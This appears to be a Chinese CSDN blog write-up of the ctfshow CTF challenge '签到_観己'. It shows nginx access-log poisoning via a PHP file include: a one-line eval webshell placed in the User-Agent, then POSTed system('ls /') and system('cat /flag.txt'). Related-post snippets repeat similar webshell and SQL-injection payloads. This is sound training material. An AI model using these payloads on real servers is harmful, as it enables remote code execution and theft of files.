ctfshow-WEB AK赛-签到_观己

最新推荐文章于 2024-05-15 08:37:11 发布
最新推荐文章于 2024-05-15 08:37:11 发布
阅读量2.4k 收藏 1
点赞数 2
分类专栏: web笔记 安全笔记 文章标签: web安全 ctf php web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/123142975
版权

文章目录

题目分析

打开网页
在这里插入图片描述
正则匹配过滤了php,且大小写不敏感

allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题

解题过程

在这里插入图片描述

?file=/var/log/nginx/access.log

发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话

在这里插入图片描述
在UA中添加一句话木马 <?php eval($_POST[1]);?>

在POST中令1=system('ls /');查看根目录中的文件

发现有个flag.txt 这里应该就是flag在的位置了

在这里插入图片描述
POST中令1=system('cat /flag.txt');

sec0nd_
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
matlab终止以下代码-Project4-Person_detection_RT-AK:人检测
05-21
matlab终止以下代码 Person detection 让 AI 在你的板子上尽情舞蹈~ 本次实验的是识别摄像头中的人,就一个人,而不是多个。 从多类别检测模型改编而来,只保留 person 这个类别,根据各位看官的能力完全可以改成...
[ctf.show]签到_观己
Rabbit_Gray的博客
08-16 800
进入题目,显示了源码,其中对于file参数中检测是否包含php字符串,大小写不敏感。 所以伪协议 php://input 等无法使用 测试了一下data://伪协议,结果显示目标服务器配置中关闭了这个伪协议 从服务器返回的响应头中可以知道服务器是nginx服务器 nginx服务器的访问日志文件路径是/var/log/nginx/access.log 尝试包含了一下日志文件,成功 访问日志文件记录了服务器收到的每一次请求的 IP、访问时间、URL、User-Agent,这4..
CTFshow webAK签到_观己
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-15 507
1.打开环境 Fn+F12(或者F12) 检查元素,打开Hackbar。 Hackbar 安装教程 2.首先访问file=/var/log/nginx/access.log看日志文件是否存在 一句话木马: <?php @eval($_GET['pass']);?> 上述操作结果如下: 3.添加 &pass=phpinfo(); 效果: (emm..有点走远了.....) 4. 改成: &pass=system("ca...
ctfshow WEB AK
LYJ20010728的博客
06-14 4560
WEB AK签到_观己考点思路Payloadweb1_观字考点思路Payloadweb2_观星考点思路Payloadweb3_观图考点思路Payloadweb4_观心考点思路Payload 签到_观己 考点 文件包含 思路 盲猜一波flag在根目录下,所以直接读取试试 Payload 源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){
ctfshow webAK
qq_45655564的博客
09-01 271
签到_观己 web1_观字 web2_观星 点击不同的链接上方的url处id会有变化,所以可能是SQL注入 于是试了几下,令id2/2发现是id=1的界面,可以确定是数字型注入,然后又发现它过滤了一些东西 所以,就fuzz了一下,发现主要困难在于过滤了逗号,like,等于号。所以我们只好盲注了。 首先爆数据库 0^(length(database())regexp(4)) 可以知到数据库长度是4 然后 0^(substr(database()from/**/1/**/for/**/1)regexp()
ctfshow_web_AK
m0_62422842的博客
06-08 411
这些题涉及到的知识点主要有日志包含,url的绕过,数字型盲注的一些bypass以及脚本的编写,还有php语言的应用。
W_ASR_AK-12_ghost_AK-12_Weapon_
10-02
assault rifle AK-12 from Ghost Recon Wildlands
W_ASR_AK-74_ghost_AK-74_Weapon_
10-02
assault rifle AK-74 from Ghost Recon Wildlands
ak5574en-en-datasheet_AudioADC_
09-29
Audio ADC ak5574en. Hi_end ADC for Audio
Ak-890 KD-880GDriverV318_20190117.exe
02-09
逊镭AK890 针式打印机驱动 我用了3个小时没找到,浪费了我N多时间,亲测可用
CTFshow web AKwp
HoAd'blog
01-26 443
CTFshow WEB AKak wp签到_观己web1_观字web2_观星web3_观图web4_观心总结 ak wp 签到_观己 正则匹配过滤了php,且大小写不敏感,后面又有include函数,已经是对php的伪协议的一个考点。 php被过滤,我们可以用data://伪协议 发现allow_url_include没有开启,还得另寻他法。做题的时候没想到有日志包含,还是题做得太少了。 payload:file=/var/log/nginx/access.log 通过将一句话木马写入到UA中 &
ctfshow刷题-web签到题,web2
m0_52011198的博客
02-21 526
ctfshow刷题
CTFshow WEB web签到
Y1da的博客
04-19 943
CTFshow WEB web签到题 进入环境后F12查看源代码 where is flag? <!-- Y3Rmc2hvd3tiM2ZkZDFlMS03N2E5LTQ5MmMtOWI2Ny1jM2FjMzliNmVhY2R9--> 怀疑注释是base64编码,尝试解码,得到flag ctfshow{b3fdd1e1-77a9-492c-9b67-c3ac39b6eacd} ...
ctfshow-WEB-web1签到
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
ctfshow web
m0_73239569的博客
03-04 817
记录刷题
ctfshow-web
qq_43618536的博客
07-15 658
ctfshow-web
一表捋清网络安全等级保护测评要求
最新发布
weixin_45840241的博客
05-15 558
对于中小企事业单位来说,网络安全建设是一个复杂且投入较高的过程,因此他们更倾向于寻找一种“省心省力”的等保建设方案,以及一种能够持续有效且具有较高性价比的网络安全建设投入方式。通过采用等保一体机方案,客户能够根据自身需求定制所需的安全能力,例如等保二级能力与行为管理能力的结合,等保三级能力与远程安全接入能力的结合等。等保安全套餐方案一直致力于构建“一站式省时省力过等保,安全有效且具有高性价比”的优势,以更好地满足中小企事业单位的网络安全建设需求。导致的安全设备闲置或无法满足等保要求等。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 583
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
ctfshow web web ak观心
09-11
CTFShow的Web AK中,观心考点的payload可以参考以下内容。引用[1]提供了一系列关于Web AK观心考点的思路payload。引用中给出了一个源码示例,其中对传入的文件参数进行了校验。如果传入的文件名中包含"php"这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值